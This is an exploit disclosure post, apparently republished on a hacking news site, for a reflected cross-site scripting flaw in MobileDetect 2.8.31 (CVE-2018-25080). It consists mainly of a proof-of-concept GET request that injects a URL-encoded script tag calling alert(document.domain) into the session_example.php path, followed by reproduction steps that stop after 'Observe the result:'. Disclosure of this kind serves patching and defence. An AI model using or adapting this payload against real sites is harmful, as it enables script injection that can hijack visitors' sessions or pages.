Hacking

MobileDetect 2.8.31 – Cross-Site Scripting (XSS)

Author4 hours ago01 mins

# Exploit Title: MobileDetect 2.8.31 - Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/serbanghita/Mobile-Detect/
# Software Link: https://github.com/serbanghita/Mobile-Detect/
# Version: 4da80e5
# Tested on: Windows
# CVE : CVE-2018-25080

Proof Of Concept:
GET http://mobiledetect/examples/session_example.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E

Steps to Reproduce
1. Login as an admin user.
2. Send the request.
3. Observe the result:

Source link